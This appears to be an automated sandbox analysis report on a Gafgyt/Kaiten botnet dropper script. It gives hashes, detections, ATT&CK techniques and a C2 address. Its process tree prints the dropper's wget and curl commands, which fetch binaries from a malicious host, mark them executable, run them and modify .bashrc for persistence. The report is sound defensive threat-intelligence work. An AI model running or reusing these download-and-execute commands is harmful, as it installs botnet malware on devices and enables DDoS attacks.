gafgyt | 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

Analysis

max time kernel
33s
max time network
35s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
23-10-2024 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Size

3KB
MD5

cf70ee36f1e9247f2146e4981924d4f4
SHA1

7eabae4200118c4e89979658db6e4d905fe3dae9
SHA256

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
SHA512

60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

Score

10^/10

gafgyt kaiten botnet defense_evasion discovery persistence privilege_escalation

Malware Config

Extracted

Family

gafgyt

104.234.24.138:1990

Signatures

Detected Gafgyt variant 1 IoCs

Processes:

resource yara_rule

/tmp/x00x family_gafgyt

resource	yara_rule
/tmp/x00x	family_gafgyt

Detects Kaiten/Tsunami Payload 2 IoCs

Processes:

resource	yara_rule
/tmp/m3cr0	family_kaiten2
/tmp/zigaarch64	family_kaiten2

Detects Kaiten/Tsunami payload 2 IoCs

Processes:

resource	yara_rule
/tmp/m3cr0	family_kaiten
/tmp/zigaarch64	family_kaiten

Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmod

pid process

781 chmod
824 chmod
717 chmod
737 chmod
Executes dropped EXE 4 IoCs

Processes:

m3cr0zigaarch64x00xm3cr0

ioc pid process

/tmp/m3cr0 718 m3cr0
/tmp/zigaarch64 738 zigaarch64
/tmp/x00x 783 x00x
/tmp/m3cr0 825 m3cr0
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
persistence privilege_escalation defense_evasion

Path Interception by PATH Environment Variable
T1574.007

Processes:

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

description ioc process

File opened for modification /root/.bashrc 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Modifies Bash startup script 2 TTPs 1 IoCs
persistence

Boot or Logon Autostart Execution
T1547

Unix Shell Configuration Modification
T1546.004

Processes:

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

description ioc process

File opened for modification /root/.bashrc 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

pid	process
781	chmod
824	chmod
717	chmod
737	chmod

ioc	pid	process
/tmp/m3cr0	718	m3cr0
/tmp/zigaarch64	738	zigaarch64
/tmp/x00x	783	x00x
/tmp/m3cr0	825	m3cr0

description	ioc	process
File opened for modification	/root/.bashrc	0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

description	ioc	process
File opened for modification	/root/.bashrc	0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh

Reads runtime system information 5 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 10 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlwgetwgetcurlcurlwgetcurlwgetcurl

description	ioc	process
File opened for modification	/tmp/bash.sh	wget
File opened for modification	/tmp/bash.sh	curl
File opened for modification	/tmp/m3cr0	wget
File opened for modification	/tmp/x00x	wget
File opened for modification	/tmp/x00x	curl
File opened for modification	/tmp/m3cr0	curl
File opened for modification	/tmp/m3cr0	wget
File opened for modification	/tmp/m3cr0	curl
File opened for modification	/tmp/zigaarch64	wget
File opened for modification	/tmp/zigaarch64	curl

/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
1⤵
- Creates/modifies environment variables
- Modifies Bash startup script
PID:687
- /usr/bin/wget
  wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
  2⤵
  - Writes file to tmp directory
  PID:690
- /usr/bin/curl
  curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:715
- /bin/chmod
  chmod +x m3cr0
  2⤵
  - File and Directory Permissions Modification
  PID:717
- /tmp/m3cr0
  ./m3cr0
  2⤵
  - Executes dropped EXE
  PID:718
- /bin/rm
  rm -rf m3cr0
  2⤵
  PID:720
- /bin/rm
  rm -rf m3cr0.1
  2⤵
  PID:721
- /usr/bin/wget
  wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64
  2⤵
  - Writes file to tmp directory
  PID:722
- /usr/bin/curl
  curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:723
- /bin/chmod
  chmod +x zigaarch64
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/zigaarch64
  ./zigaarch64
  2⤵
  - Executes dropped EXE
  PID:738
- /bin/rm
  rm -rf zigaarch64
  2⤵
  PID:742
- /bin/rm
  rm -rf zigaarch64.1
  2⤵
  PID:743
- /usr/bin/wget
  wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x
  2⤵
  - Writes file to tmp directory
  PID:744
- /usr/bin/curl
  curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:776
- /bin/chmod
  chmod +x x00x
  2⤵
  - File and Directory Permissions Modification
  PID:781
- /tmp/x00x
  ./x00x
  2⤵
  - Executes dropped EXE
  PID:783
- /bin/rm
  rm -rf x00x
  2⤵
  PID:785
- /bin/rm
  rm -rf x00x.1
  2⤵
  PID:787
- /usr/bin/wget
  wget http://floodernetwork111.accesscam.org:8089/bash.sh
  2⤵
  - Writes file to tmp directory
  PID:788
- /usr/bin/curl
  curl -O http://floodernetwork111.accesscam.org:8089/bash.sh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:807
- /bin/rm
  rm -rf bash.sh.1
  2⤵
  PID:817
- /bin/bash
  bash bash.sh
  2⤵
  PID:816
- - /usr/bin/wget
    wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
    3⤵
    - Writes file to tmp directory
    PID:818
- - /usr/bin/curl
    curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
    3⤵
    - Reads runtime system information
    - Writes file to tmp directory
    PID:822
- - /bin/chmod
    chmod +x m3cr0
    3⤵
    - File and Directory Permissions Modification
    PID:824
- - /tmp/m3cr0
    ./m3cr0
    3⤵
    - Executes dropped EXE
    PID:825
- - /bin/rm
    rm -rf m3cr0
    3⤵
    PID:827
- - /bin/rm
    rm -rf m3cr0.1
    3⤵
    PID:828
- - /bin/sleep
    sleep 6000
    3⤵
    PID:829

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/bash.sh

Filesize
236B

MD5
8bbe815474c7d3ed318e958c05e1c95b

SHA1
36235a707a29d27b01570ef8c973c522f563c15c

SHA256
469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b

SHA512
137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f

Download Submit
/tmp/m3cr0

Filesize
983KB

MD5
75c00b238bd8105414cbb5d08601ca1a

SHA1
2a5e59555f348bfd9fa9fc4e3e04338ee4e74576

SHA256
edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361

SHA512
a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5

Download Submit
/tmp/x00x

Filesize
985KB

MD5
f042a9131a6d06671e98c1ed1f8d80a8

SHA1
dd97fac87e8d4a973dc4867524908f3384916f27

SHA256
a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c

SHA512
629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe

Download Submit
/tmp/zigaarch64

Filesize
73KB

MD5
48ea3c3566c796e4f74e8e3d6df15cd3

SHA1
b1ef1574ced09471c26a4c749d5a4ab5ba7942cd

SHA256
79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a

SHA512
cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd

Download Submit